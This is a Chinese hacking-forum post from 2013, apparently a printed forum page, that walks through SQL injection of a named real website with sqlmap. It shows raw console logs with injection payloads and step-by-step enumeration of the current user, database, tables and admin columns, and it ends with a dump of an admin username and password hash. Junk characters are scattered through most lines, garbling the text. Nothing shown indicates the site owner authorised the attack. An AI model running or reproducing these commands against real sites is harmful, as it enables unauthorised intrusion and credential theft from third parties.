中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]
作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- C% d' k1 t& t) F2 Tms "Mysql" --current-user       /*  注解:获取当前用户名称1 U% g- H! L  g6 S9 E
    sqlmap/0.9 - automatic SQL injection and database takeover tool2 K5 r% C" P. L7 ?1 X
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    ; o/ s9 o- t' z' h/ {# _& ^# K[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" @  s( Z8 ^$ w& i4 H. g8 Y. d) A: h
    session file
    ( s5 x( V9 T% U* W! K1 i3 N[16:53:54] [INFO] resuming injection data from session file8 ], j5 ^" s6 c
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file, i( j# }0 x/ X9 D. Z
    [16:53:54] [INFO] testing connection to the target url+ M) m" R5 a, K8 C8 t2 R2 y. F( O
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque" ^2 i( p& y: i: t" ^
    sts:, O# @" p) ~+ h" d$ z8 {$ N& G
    ---
    1 q$ j% x. f( g0 o- W- l" hPlace: GET8 ]: Q6 b. r  F# f0 D4 i; W
    Parameter: id( `3 j7 F5 D% t7 e) y
        Type: boolean-based blind
    0 m! ~2 ^, f4 P* ]7 s0 n* K    Title: AND boolean-based blind - WHERE or HAVING clause
    - I- w* M$ q* k    Payload: id=276 AND 799=7995 M- H) ^  Q/ f
        Type: error-based( |5 n1 }9 h$ V( x* g2 x
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; r: h2 t3 N8 r% Q7 L) \
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 Q' e  s8 I- ?9 L3 t" P8 v
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    7 C; I, o( v! G),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    " T; Z% S6 G7 \" [( ~; {    Type: UNION query
    9 t, l5 C0 ^) `0 O. Z% O    Title: MySQL UNION query (NULL) - 1 to 10 columns
    % T4 U; C- d, M: U    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& V1 h6 }% }, G3 B
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    8 S. w8 b; I. c, t. [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ' ~! N, ?+ r" |    Type: AND/OR time-based blind- `9 G: V% P7 C3 f6 k
        Title: MySQL > 5.0.11 AND time-based blind
    7 i0 y6 Z3 g  ?1 K. U8 c; x* Z    Payload: id=276 AND SLEEP(5)
    ! o7 C$ X* ^) M: r2 \---
    : \4 z- v$ g& U3 M5 U5 c/ L[16:53:55] [INFO] the back-end DBMS is MySQL# M2 t8 u. [) s; L
    web server operating system: Windows
    , j% C' R/ \. a7 f; `1 P! xweb application technology: Apache 2.2.11, PHP 5.3.06 t) \; f+ t- c$ ?% E
    back-end DBMS: MySQL 5.04 j3 T( D) c, W8 `8 L( K) N
    [16:53:55] [INFO] fetching current user) p; L8 |( m3 a4 D! W$ n+ k% d* S2 O
    current user:    'root@localhost'   $ o; ?1 i# c6 ?
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 z* u( T4 X0 z+ B  K) Y  t
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    ; }5 \4 k) n. J# b' H8 X
    ( f5 Z* S( A. S) _; KD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    9 T5 e( y% o5 x5 I/ O6 P. rms "Mysql" --current-db                  /*当前数据库
    % T# U: X4 S2 J  C4 j# Y2 d$ b    sqlmap/0.9 - automatic SQL injection and database takeover tool6 a/ S4 K' V4 I( V1 P* x( q
        http://sqlmap.sourceforge.net
  • starting at: 16:54:162 K" O8 K, d/ e$ `9 x
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    3 B! m& a* e0 D! | session file7 S# R  s% Q; g5 R9 |
    [16:54:16] [INFO] resuming injection data from session file$ M- B4 B5 k  d4 Y
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    & f( l! }. E3 U[16:54:16] [INFO] testing connection to the target url: R; e: m  n3 X9 h9 f# ?
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque, t8 P2 t( U0 I% y
    sts:* B( Y6 S8 H0 s* W' h
    ---! g0 z3 l5 T: f
    Place: GET
    8 I) U8 V& \+ |& I& r! n) FParameter: id
    6 r  i- K* ~+ p; w) F    Type: boolean-based blind7 q! {1 V2 B, N' m% i: L* H' S, W/ J; w
        Title: AND boolean-based blind - WHERE or HAVING clause
    2 ?6 C+ C8 |% H& W" U    Payload: id=276 AND 799=799  U6 H- V; L/ P- c) J* w; w
        Type: error-based9 F; f+ d/ B, M5 I* \0 Q3 P
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% R1 J& I! U- u* \4 S9 A
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 o: A- B9 C# F
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    4 Q4 y/ B# l/ c4 q! Q% L+ G! g0 X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) q( p' S6 R9 T& F3 w
        Type: UNION query
    ! u* F! L( _; Q4 p- w    Title: MySQL UNION query (NULL) - 1 to 10 columns; @3 r* |/ P# @. ?
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    1 {; _. ]5 W$ X9 R" X' f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( Z; L6 ?; F3 C
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    3 p, i; c* h& q8 o; m- p* P  |' s    Type: AND/OR time-based blind
    5 u  ]' i' w, w    Title: MySQL > 5.0.11 AND time-based blind
    $ b- `8 W1 B% c0 h) K6 D8 R$ C    Payload: id=276 AND SLEEP(5)( f5 V1 U8 |6 J$ d
    ---6 h9 [8 J, [8 k# @
    [16:54:17] [INFO] the back-end DBMS is MySQL" F" S* @. w9 W/ s
    web server operating system: Windows' o' {" E" ^6 W
    web application technology: Apache 2.2.11, PHP 5.3.0
    / v: f4 f/ v$ h' aback-end DBMS: MySQL 5.0$ R: o* j. v7 Q. a- C5 I
    [16:54:17] [INFO] fetching current database
    3 O2 P4 M5 P; c& Icurrent database:    'wepost'5 Z+ I' |" g+ E8 u# U
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    * Y7 g  u1 F* R! Stput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    # g- E1 K& X" K. P. V9 ?/ \. uD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* w, W3 y, Y' q/ }9 X
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    ( l4 P$ `0 h7 ?2 C$ ~9 F7 s- P    sqlmap/0.9 - automatic SQL injection and database takeover tool" p% H; U* v- h5 W* R+ R
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    $ B) k4 _& X6 C$ f8 q# Y) a[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    & J& n' \( Z* ^2 M" H) g session file4 R4 [( v- {, Y/ y
    [16:55:25] [INFO] resuming injection data from session file: V) ~/ J! D! B6 W% ~, i, G$ p( d
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file7 x1 H- f% ?. ?1 A4 U
    [16:55:25] [INFO] testing connection to the target url: a0 x4 r% |) w* e3 w) ~+ H9 X
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    # @- z$ d, F5 v: @1 {* Ssts:* u) h  b8 `- k
    ---& |# j8 H8 D" y6 m) ?/ e
    Place: GET
    # ~- N) F2 t* k' ^0 BParameter: id
    ; K! M, F1 O) D; g7 n2 n" K    Type: boolean-based blind
    ; ^7 D" @7 T; K% u    Title: AND boolean-based blind - WHERE or HAVING clause
    ! q% Q: O0 x- k6 H9 n    Payload: id=276 AND 799=799
    & Z4 Q" n/ d! m2 F# Y' ?' E    Type: error-based! s7 D, g* x* P0 E5 _5 ^- z7 h
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    / {7 B+ n" q2 i( `4 [7 f4 V    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    + l: L/ u# P3 V  K' Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 U' d2 r, I+ W0 }. w
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 v0 I/ Y; V+ Y. k# L5 E* H    Type: UNION query( i& g! L  d; S; {' B  R) [; u4 ~
        Title: MySQL UNION query (NULL) - 1 to 10 columns, E) {- Q2 |: t" Q+ X6 r5 z
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    1 v% V  Q, @1 b6 x(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) X+ m- `. o; m/ I. _4 n9 F# A$ h
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## T6 B2 }3 g- s3 i% `4 m
        Type: AND/OR time-based blind
    6 Q# M3 Q- d1 x  P    Title: MySQL > 5.0.11 AND time-based blind
    2 f, d* P4 {6 f- \' Y    Payload: id=276 AND SLEEP(5)- x$ y( }" c3 o& u
    ---: V( ~! U! _( B1 W
    [16:55:26] [INFO] the back-end DBMS is MySQL
    8 X! |0 P. |( X2 n8 x8 y9 }' Cweb server operating system: Windows
    2 k1 A% Z; A6 @: a1 q) }, cweb application technology: Apache 2.2.11, PHP 5.3.07 e  t% F' P" V
    back-end DBMS: MySQL 5.0  l/ G/ ?( L7 u& `" F4 `: x
    [16:55:26] [INFO] fetching tables for database 'wepost'
    + U- Z6 M) e0 q( E9 _. n[16:55:27] [INFO] the SQL query used returns 6 entries9 q" E9 @7 M, M. z4 h5 A( {+ m
    Database: wepost
    9 y" T0 w, P) k[6 tables]! G: N; o9 x8 u0 F0 _  I
    +-------------+4 ]: U7 X* D$ Q: t; e
    | admin       |
    ( ^) R! `. {+ p$ h) A| article     |9 N% f7 o) y+ J8 A3 N. q
    | contributor |* p* h1 a* u5 [6 i* U
    | idea        |
    . ^9 x% F  ?7 Q; || image       |; q* _- ^: I" X/ u( S
    | issue       |# ~( X9 H" j% o8 t, o
    +-------------+
    * V0 }# @8 ~0 ^4 p0 K; q3 R[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    4 u9 L& \+ z. i3 P9 D6 f* `* htput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    ! N7 X" T/ D+ @3 X
    & A7 E$ s! M* U8 y3 t6 MD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    * C3 z) |1 V/ ?9 J+ }3 Vms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    3 q4 ~6 h: X7 ^8 N  r    sqlmap/0.9 - automatic SQL injection and database takeover tool$ j% ], q8 t/ ?# S0 t" W
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    4 Y% h3 d; e3 s4 J& A3 \sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    # V' k% q( j% z' B3 Jsts:
    ; p# L* b! X, v2 a. K4 R! L: J---
    , I) A8 b9 l0 \Place: GET
    - m8 T5 }! T! i# M9 o( r' ?Parameter: id/ R! _7 H; C9 x5 y, h% E6 J- I
        Type: boolean-based blind
    2 Y$ @( t; w4 X+ w    Title: AND boolean-based blind - WHERE or HAVING clause1 C. y! r$ |; V2 {
        Payload: id=276 AND 799=799* X% O$ L, `* a; w
        Type: error-based
      G9 v! y2 J9 L8 T    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    : P: `& X" W( f3 w0 |+ q% J' j( L    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 r) t8 v9 F% r! q/ D! w
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,586 ~* ?0 ^* \  d% N' U0 k
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ E+ f$ I/ q' N
        Type: UNION query! Y; F3 U  W  b! F
        Title: MySQL UNION query (NULL) - 1 to 10 columns, u% ?5 U5 q( F9 X, ?
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) P( o6 o8 K. C: }, K8 b3 r& C
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    3 i' J8 R/ d) }' l9 @  p7 kCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#  {/ W7 O2 X, a* ^2 [5 E4 a' V! _
        Type: AND/OR time-based blind8 `1 p4 X) v; i5 n3 B4 A. r. \2 K9 e
        Title: MySQL > 5.0.11 AND time-based blind/ {( L, i# c# Y# ^, k, `% z' Y
        Payload: id=276 AND SLEEP(5): P7 P# i/ Z1 O, Y1 o
    ---. {" _$ j5 L% R! Y; R- E- k+ P0 b
    web server operating system: Windows
    " |5 F" ]0 L  U9 g! M0 Jweb application technology: Apache 2.2.11, PHP 5.3.0
    : F2 I) L, I/ j5 b3 s8 eback-end DBMS: MySQL 5.0' o2 ^. N8 f$ G2 q* U$ J8 y8 m
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    / K3 L: N0 _- y  t$ V$ `0 q: gssion': wepost, wepost
    ! ?, L9 f. P  h# @Database: wepost4 ^! I6 V; o  G$ d& X; ^7 S
    Table: admin1 `0 F5 Y& j3 q4 k6 k
    [4 columns]1 b- c5 e8 {1 e
    +----------+-------------+6 E7 R/ @) R( t; X: k9 U# B  \; B
    | Column   | Type        |2 d" ^7 T9 R4 I% K; D
    +----------+-------------+
    + J) D8 D$ s% N( y0 z7 I* m| id       | int(11)     |+ R6 w: a* g, T' J
    | password | varchar(32) |
    + A2 c/ F# u. N4 }" R1 l| type     | varchar(10) |5 A9 V) Y9 H# O0 D, i: X1 N
    | userid   | varchar(20) |& y2 q0 V3 C+ J& Y4 f0 u
    +----------+-------------+* H3 Z* C/ f% d, `9 D
  • shutting down at: 16:56:191 s0 F) I% T0 N/ i+ p7 M  M$ x

    ' H; s& D% {* H5 n! j5 GD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) L  ~9 u+ K# T
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容6 R- C$ y4 {* l+ ~9 `' M
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    % b' I, y6 ^3 K- s; B    http://sqlmap.sourceforge.net
  • starting at: 16:57:14' }: ^! x* t2 \' i" {8 e5 U2 C
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque! I. T0 ~* ]; n0 o! x/ ~& h
    sts:+ A- n3 J7 F$ G# T) G( M* H
    ---+ K# N' M/ O- l5 M# ~
    Place: GET* [% U! a4 ~, K, F4 |/ ]  J
    Parameter: id
    ) g% n# E: \7 S! n9 r0 s    Type: boolean-based blind1 f, o, t+ l/ q9 Y( [6 Z
        Title: AND boolean-based blind - WHERE or HAVING clause0 j$ E- P9 x0 G7 V6 U) c( R
        Payload: id=276 AND 799=7992 W: n3 b$ ~  ]/ h- K5 v
        Type: error-based' R1 E- J1 F0 Y! W, q2 f# K
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! a6 H& ^* i6 H, A) W
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    $ Q# ^. J8 p: L- T8 \120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 e2 e8 X& u$ L
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)  S1 D% U7 ^9 E$ M
        Type: UNION query, z0 Z& ]! h* _0 a* ]0 y
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    4 R8 w/ m9 d, B# S# s' |    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    / K# I- w6 M: ]( c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 g, `$ n9 ^3 x  R8 M
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 g% F- Y) Y+ i3 I( q1 e3 ?, l; F: Z
        Type: AND/OR time-based blind+ O. ~2 \% M# V, {! @1 r
        Title: MySQL > 5.0.11 AND time-based blind
    * m/ s0 i' j: y2 v' b    Payload: id=276 AND SLEEP(5)
    $ I) U+ i1 m. ?  b---
    $ J6 J" t+ w4 q* ?# \3 z2 n) Wweb server operating system: Windows. F, U! ^( `4 S+ Q6 Q
    web application technology: Apache 2.2.11, PHP 5.3.0
    : R0 m8 @6 L3 Q5 ]5 g8 tback-end DBMS: MySQL 5.0
    : ]6 b2 z5 Q0 `, z. U6 qrecognized possible password hash values. do you want to use dictionary attack o9 F4 W6 J5 m8 {6 s  q
    n retrieved table items? [Y/n/q] y
    ; U! h2 \; W4 {# m5 A3 Nwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]8 t# ?8 R) c& `! w/ N
    do you want to use common password suffixes? (slow!) [y/N] y
    - m+ g8 E+ k0 T# e% g$ }Database: wepost0 `! o8 u1 E: q" h/ m- Y- j) X
    Table: admin2 j$ s8 Q1 U$ x) P* c
    [1 entry]
    / R# }( |: N# B1 G+----------------------------------+------------+
    - c0 D  ]9 a. k, U| password                         | userid     |( s! e2 K' q% }! A7 u- [
    +----------------------------------+------------+9 E( c( b4 X! h6 n2 P# W3 C
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |+ h+ {% T7 L6 U2 B  ]
    +----------------------------------+------------+2 E* ~( T! t/ Y  s
  • shutting down at: 16:58:14& B3 B5 L, `( `4 z  w0 w6 g

    * R$ M  N6 n1 B6 v5 [9 M" e: OD:\Python27\sqlmap>



    欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2